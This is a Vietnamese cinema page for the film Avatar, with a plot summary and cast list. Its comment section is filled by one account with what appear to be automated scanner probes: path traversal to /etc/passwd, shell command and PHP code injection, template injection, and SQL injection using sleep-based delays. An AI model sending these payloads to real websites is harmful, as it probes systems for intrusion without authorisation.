Phim Avatar


Avatar

Giới thiệu :

NC13 * 2h45' *

Avatar - Action, Adventure, Fantasy, Science Fiction
Avatar là câu chuyện về người anh hùng "bất đắc dĩ" Jake Sully - một cựu sĩ quan thủy quân lục chiến bị liệt nửa thân. Anh được chọn để tham gia vào chương trình cấy gien với người ngoài hành tinh Na';vi nhằm tạo ra một giống loài mới có thể hít thở không khí tại hành tinh Pandora. Giống người mới này được gọi là Avatar. Sau khi đã trở thành một Avatar, Jake có nhiệm vụ đi tìm hiều và nghiên cứu hành tinh Pandora. Những thông tin mà anh thu thập được rất có giá trị cho chiến dịch xâm chiếm hành tinh xanh thứ hai này của loài người.
Diễn viên: Sam Worthington, Zoe Saldana, Sigourney Weaver, Stephen Lang, Michelle Rodriguez
Đạo diễn: James Cameron

Xem lịch chiếu phim Avatar tại các rạp toàn quốc


Trailer phim


avatar

Phim này có 96 Bình Luận
pHqghUme
pHqghUme . 24/09/2022 14:37:03
555
pHqghUme
pHqghUme . 24/09/2022 14:37:06
1Hmme6VNO
pHqghUme
pHqghUme . 24/09/2022 14:37:07
wbIlRCf2
pHqghUme
pHqghUme . 24/09/2022 14:37:07
555 @
pHqghUme
pHqghUme . 24/09/2022 14:37:07
555
pHqghUme
pHqghUme . 24/09/2022 14:37:07
(9219685*9900751)
pHqghUme
pHqghUme . 24/09/2022 14:37:08
to@> @
pHqghUme
pHqghUme . 24/09/2022 14:37:08
555
pHqghUme
pHqghUme . 24/09/2022 14:37:08
'+(9219685*9900751)+'
pHqghUme
pHqghUme . 24/09/2022 14:37:08
555
pHqghUme
pHqghUme . 24/09/2022 14:37:08
../../../../../../../../../../../../../../etc/passwd
pHqghUme
pHqghUme . 24/09/2022 14:37:08
555
pHqghUme
pHqghUme . 24/09/2022 14:37:08
"+(9219685*9900751)+"
pHqghUme
pHqghUme . 24/09/2022 14:37:08
555
pHqghUme
pHqghUme . 24/09/2022 14:37:08
../../../../../../../../../../../../../../
pHqghUme
pHqghUme . 24/09/2022 14:37:09
555
pHqghUme
pHqghUme . 24/09/2022 14:37:09
12345'"\'\");|]*{ ?''💡
pHqghUme
pHqghUme . 24/09/2022 14:37:09
${9999214+9999896}
pHqghUme
pHqghUme . 24/09/2022 14:37:09
../555
pHqghUme
pHqghUme . 24/09/2022 14:37:10
echo ionnlg$()\ qwrryt\nz^xyu||a #' &echo ionnlg$()\ qwrryt\nz^xyu||a #|" &echo ionnlg$()\ qwrryt\nz^xyu||a #
pHqghUme
pHqghUme . 24/09/2022 14:37:10
&echo giumdx$()\ ffudyn\nz^xyu||a #' &echo giumdx$()\ ffudyn\nz^xyu||a #|" &echo giumdx$()\ ffudyn\nz^xyu||a #
pHqghUme
pHqghUme . 24/09/2022 14:37:10
555
pHqghUme
pHqghUme . 24/09/2022 14:37:11
|echo imspqk$()\ kbcoqw\nz^xyu||a #' |echo imspqk$()\ kbcoqw\nz^xyu||a #|" |echo imspqk$()\ kbcoqw\nz^xyu||a #
pHqghUme
pHqghUme . 24/09/2022 14:37:11
)
pHqghUme
pHqghUme . 24/09/2022 14:37:11
555
pHqghUme
pHqghUme . 24/09/2022 14:37:11
(nslookup ||perl -e "gethostbyname('')")
pHqghUme
pHqghUme . 24/09/2022 14:37:11
'"()
pHqghUme
pHqghUme . 24/09/2022 14:37:11
!(()&&!|*|*|
pHqghUme
pHqghUme . 24/09/2022 14:37:12
$(nslookup ||perl -e "gethostbyname('')")
pHqghUme
pHqghUme . 24/09/2022 14:37:12
pHqghUme
pHqghUme . 24/09/2022 14:37:12
'.gethostbyname(lc('hitpl'.'')).'A'.chr(67).chr(hex('58')).chr(117).chr(79).chr(100).chr(84).'
pHqghUme
pHqghUme . 24/09/2022 14:37:12
^(#$!@#$)(()))******
pHqghUme
pHqghUme . 24/09/2022 14:37:12
&(nslookup ||perl -e "gethostbyname('')")&'\"`0&(nslookup ||perl -e "gethostbyname('')")&`'
pHqghUme
pHqghUme . 24/09/2022 14:37:12
1some_inexistent_file_with_long_name.jpg
pHqghUme
pHqghUme . 24/09/2022 14:37:12
pHqghUme
pHqghUme . 24/09/2022 14:37:12
".gethostbyname(lc("hityb".""))."A".chr(67).chr(hex("58")).chr(100).chr(70).chr(118).chr(88)."
pHqghUme
pHqghUme . 24/09/2022 14:37:13
|(nslookup ||perl -e "gethostbyname('')")
pHqghUme
pHqghUme . 24/09/2022 14:37:13
pHqghUme
pHqghUme . 24/09/2022 14:37:13
pHqghUme
pHqghUme . 24/09/2022 14:37:13
`(nslookup ||perl -e "gethostbyname('')")`
pHqghUme
pHqghUme . 24/09/2022 14:37:13
pHqghUme
pHqghUme . 24/09/2022 14:37:13
;(nslookup ||perl -e "gethostbyname('')")|(nslookup ||perl -e "gethostbyname('')")&(nslookup ||perl -e "gethostbyname('')")
pHqghUme
pHqghUme . 24/09/2022 14:37:14
"+"A".concat(70-3).concat(22*4).concat(103).concat(65).concat(121).concat(67)+(require"socket" ("hitxm"+"")[3].to_s)+"
pHqghUme
pHqghUme . 24/09/2022 14:37:14
/etc/shells
pHqghUme
pHqghUme . 24/09/2022 14:37:14
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
pHqghUme
pHqghUme . 24/09/2022 14:37:14
'+'A'.concat(70-3).concat(22*4).concat(99).concat(86).concat(103).concat(76)+(require'socket' ('hityx'+'')[3].to_s)+'
pHqghUme
pHqghUme . 24/09/2022 14:37:14
c:/
pHqghUme
pHqghUme . 24/09/2022 14:37:14
comments
pHqghUme
pHqghUme . 24/09/2022 14:37:14
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
pHqghUme
pHqghUme . 24/09/2022 14:37:14
';print(md5(31337));$a='
pHqghUme
pHqghUme . 24/09/2022 14:37:14
pHqghUme
pHqghUme . 24/09/2022 14:37:14
555&n963458=v914450
pHqghUme
pHqghUme . 24/09/2022 14:37:15
pHqghUme
pHqghUme . 24/09/2022 14:37:15
comments
pHqghUme
pHqghUme . 24/09/2022 14:37:15
";print(md5(31337));$a="
pHqghUme
pHqghUme . 24/09/2022 14:37:15
555
pHqghUme
pHqghUme . 24/09/2022 14:37:15
comments/.
pHqghUme
pHqghUme . 24/09/2022 14:37:15
'"
pHqghUme
pHqghUme . 24/09/2022 14:37:15
${@print(md5(31337))}
pHqghUme
pHqghUme . 24/09/2022 14:37:15
pHqghUme
pHqghUme . 24/09/2022 14:37:15
${@print(md5(31337))}\
pHqghUme
pHqghUme . 24/09/2022 14:37:16
'.print(md5(31337)).'
pHqghUme
pHqghUme . 24/09/2022 14:37:31
555'"()&%QOzU(9641)
pHqghUme
pHqghUme . 24/09/2022 14:37:36
'"()&%QOzU(9216)
pHqghUme
pHqghUme . 24/09/2022 14:37:40
5559667354
pHqghUme
pHqghUme . 24/09/2022 14:37:45
555
pHqghUme
pHqghUme . 24/09/2022 14:37:53
555
pHqghUme
pHqghUme . 24/09/2022 14:37:56
555
pHqghUme
pHqghUme . 24/09/2022 14:37:59
BfWJMkL6
pHqghUme
pHqghUme . 24/09/2022 14:37:59
-1 OR 2+989-989-1=0+0+0+1 --
pHqghUme
pHqghUme . 24/09/2022 14:38:00
-1 OR 2+981-981-1=0+0+0+1
pHqghUme
pHqghUme . 24/09/2022 14:38:00
-1' OR 2+711-711-1=0+0+0+1 --
pHqghUme
pHqghUme . 24/09/2022 14:38:01
-1' OR 2+259-259-1=0+0+0+1 or '6XVBJwjL'='
pHqghUme
pHqghUme . 24/09/2022 14:38:02
-1" OR 2+54-54-1=0+0+0+1 --
pHqghUme
pHqghUme . 24/09/2022 14:38:05
if(now()=sysdate(),sleep(15),0)
pHqghUme
pHqghUme . 24/09/2022 14:38:10
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme
pHqghUme . 24/09/2022 14:38:14
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme
pHqghUme . 24/09/2022 14:38:18
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme
pHqghUme . 24/09/2022 14:38:22
-1; waitfor delay '0:0:15' --
pHqghUme
pHqghUme . 24/09/2022 14:38:27
-1); waitfor delay '0:0:15' --
pHqghUme
pHqghUme . 24/09/2022 14:38:32
1 waitfor delay '0:0:15' --
pHqghUme
pHqghUme . 24/09/2022 14:38:38
sM7yyRZm'; waitfor delay '0:0:15' --
pHqghUme
pHqghUme . 24/09/2022 14:38:44
-5 OR 716=(SELECT 716 FROM PG_SLEEP(15))--
pHqghUme
pHqghUme . 24/09/2022 14:38:49
-5) OR 187=(SELECT 187 FROM PG_SLEEP(15))--
pHqghUme
pHqghUme . 24/09/2022 14:38:55
-1)) OR 502=(SELECT 502 FROM PG_SLEEP(15))--
pHqghUme
pHqghUme . 24/09/2022 14:39:02
i5zyPR1B' OR 297=(SELECT 297 FROM PG_SLEEP(15))--
pHqghUme
pHqghUme . 24/09/2022 14:39:04
1
pHqghUme
pHqghUme . 24/09/2022 14:39:09
3sHibyjX') OR 544=(SELECT 544 FROM PG_SLEEP(15))--
pHqghUme
pHqghUme . 24/09/2022 14:39:14
L39ga59B')) OR 724=(SELECT 724 FROM PG_SLEEP(15))--
pHqghUme
pHqghUme . 24/09/2022 14:39:20
555*(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme
pHqghUme . 24/09/2022 14:39:25
555'||(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme
pHqghUme . 24/09/2022 14:39:25
1'"
pHqghUme
pHqghUme . 24/09/2022 14:39:26
1????%2527%2522
pHqghUme
pHqghUme . 24/09/2022 14:39:26
@@ZEPMB
pHqghUme
pHqghUme . 24/09/2022 14:39:32
555
pHqghUme
pHqghUme . 24/09/2022 14:39:36
555

Thông tin khuyến mãi

Phim Đang Chiếu

Nhóc Nicolas
Nhóc Nicolas

Little Nicholas * 1h31' *
Perfect Days
Perfect Days

PERFECT DAYS * T13 * 2h4' *


Chicken For Linda
Chicken For Linda

P * 1h13' *


Tin mới